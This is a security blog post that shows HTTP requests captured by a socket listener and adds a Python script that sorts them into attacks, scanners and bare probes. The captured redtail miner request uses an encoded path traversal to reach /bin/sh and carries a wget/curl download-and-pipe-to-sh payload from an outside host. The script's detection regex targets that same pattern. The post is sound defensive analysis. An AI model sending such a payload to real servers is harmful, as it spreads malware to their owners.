Over the course of consulting engagements over the past few weeks, I've used socket listeners quite often due to their usefulness. In doing so, I would meet my goals but also opened up my testing VM to possible threats and some unique new user agents most have never seen before.
The first one below is from the newly infamous redtail miner.
And here's some strategic intel on that: I only had this listener open for one working day before I got that request.
Just one! Check them out below. You'd be amazed at what you can learn when opening up a socket listener, just be careful.
[+] CONNECTION FROM: 95.70.169.208
RAW DATA RECEIVED (368 bytes):
b'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1\r\nAccept: /\r\nUpgrade-Insecure-Requests: 1\r\nHost: 18.119.96.49:80\r\nUser-Agent: libredtail-http\r\nConnection: keep-alive\r\nContent-Type: text/plain\r\nContent-Length: 119\r\n\r\n(wget --no-check-certificate -qO- https://178.16.55.224/sh || curl -sk https://178.16.55.224/sh) | sh -s apache.selfrep'
REQUEST LINE: POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
Other notable ones are below.
[+] CONNECTION FROM: 167.94.138.115
RAW DATA RECEIVED (158 bytes):
b'GET / HTTP/1.1\r\nHost: 18.119.96.49\r\nUser-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)\r\nAccept: /\r\nAccept-Encoding: gzip\r\n\r\n'
REQUEST LINE: GET / HTTP/1.1
[+] CONNECTION FROM: 185.247.137.192
RAW DATA RECEIVED (192 bytes):
b'GET / HTTP/1.1\r\nHost: 18.119.96.49\r\nUser-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)\r\nConnection: close\r\nAccept: /\r\nAccept-Encoding: gzip\r\n\r\n'
REQUEST LINE: GET / HTTP/1.1
[+] CONNECTION FROM: 185.247.137.190
RAW DATA RECEIVED (298 bytes):
b""
REQUEST LINE:
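What makes the redtail request hostile is not the odd user agent but two things a triage script can check mechanically: the request target decodes (`.%2e` is `..`) to a path that climbs ten levels above `/cgi-bin/` and lands on `/bin/sh`, and the body is a download-and-pipe-into-`sh` one-liner. The two scanner hits and the empty connection are the noise you have to separate it from. The script below is an added example, not the listener code from this post: it parses raw captures like the ones above, normalizes the path the way a server would (including double-encoded `%252e`), and classifies each hit. The samples are re-typed from the captures; the `Accept: */*` value is my assumption (the blog's rendering shows only `/`), and the scanner user-agent list and the `wget|curl ... | sh` regex are my own choices.

```python
import re
from urllib.parse import unquote

# Constructed samples, re-typed from the captures in this post for the example.
# "Accept: */*" is assumed; the rendered post shows only "Accept: /".
REDTAIL = (
    b"POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1\r\n"
    b"Accept: */*\r\nUpgrade-Insecure-Requests: 1\r\nHost: 18.119.96.49:80\r\n"
    b"User-Agent: libredtail-http\r\nConnection: keep-alive\r\n"
    b"Content-Type: text/plain\r\nContent-Length: 119\r\n\r\n"
    b"(wget --no-check-certificate -qO- https://178.16.55.224/sh || "
    b"curl -sk https://178.16.55.224/sh) | sh -s apache.selfrep"
)
CENSYS = (
    b"GET / HTTP/1.1\r\nHost: 18.119.96.49\r\n"
    b"User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)\r\n"
    b"Accept: */*\r\nAccept-Encoding: gzip\r\n\r\n"
)
EMPTY = b""  # the 185.247.137.190 hit: a TCP connect with no HTTP at all

# Assumed list of research scanners worth down-ranking; extend to taste.
KNOWN_SCANNER_UA = ("CensysInspect", "InternetMeasurement")
# "wget|curl <anything without a pipe> | sh" (or bash): fetch-and-execute.
DOWNLOAD_EXEC = re.compile(rb"\b(wget|curl)\b[^|\n]*\|\s*(ba)?sh\b")


def parse_request(raw):
    """Split a raw HTTP/1.x request into request line, headers and body.
    Returns None for an empty or malformed request (a bare TCP probe)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ")
    if len(parts) != 3 or not parts[2].startswith(b"HTTP/"):
        return None
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return {"method": parts[0].decode("latin-1"), "target": parts[1].decode("latin-1"),
            "version": parts[2].decode("latin-1"), "headers": headers, "body": body}


def normalize_path(target):
    """Percent-decode until stable (catches %252e double encoding), then resolve
    dot segments the way a server would. Returns (clean_path, root_escapes),
    where root_escapes counts '..' segments that tried to climb above '/'."""
    path = target.split("?", 1)[0]
    for _ in range(3):  # bounded: a few rounds is enough for real-world encodings
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    stack, escapes = [], 0
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if stack:
                stack.pop()
            else:
                escapes += 1
        else:
            stack.append(seg)
    return "/" + "/".join(stack), escapes


def triage(raw):
    """Classify one captured request as 'probe' (no HTTP), 'attack' (traversal,
    shell target or download-and-run body), 'scanner' (known research UA with
    no hostile indicators) or 'unknown'. The indicators explain the verdict."""
    req = parse_request(raw)
    if req is None:
        return {"verdict": "probe", "indicators": [], "path": None, "ua": None}
    indicators = []
    path, escapes = normalize_path(req["target"])
    if escapes or ".." in unquote(req["target"]):
        indicators.append(f"traversal -> {path} ({escapes} steps above root)")
    if path.endswith(("/bin/sh", "/bin/bash")):
        indicators.append("target resolves to a shell binary")
    if DOWNLOAD_EXEC.search(req["body"]):
        indicators.append("body downloads a script and pipes it into sh")
    ua = req["headers"].get("user-agent", "")
    if indicators:
        verdict = "attack"
    elif any(tag in ua for tag in KNOWN_SCANNER_UA):
        verdict = "scanner"
    else:
        verdict = "unknown"
    return {"verdict": verdict, "indicators": indicators, "path": path, "ua": ua}


if __name__ == "__main__":
    for name, sample in (("redtail", REDTAIL), ("censys", CENSYS), ("empty", EMPTY)):
        print(name, triage(sample))
```

Run against the three samples it reports the redtail hit as an attack with all three indicators (nine levels above root, target `/bin/sh`, fetch-and-execute body), the Censys hit as a scanner, and the empty connection as a probe. The point of decoding before matching is that a naive grep for `../` never sees the `.%2e` form at all, which is exactly why the miner encodes it that way.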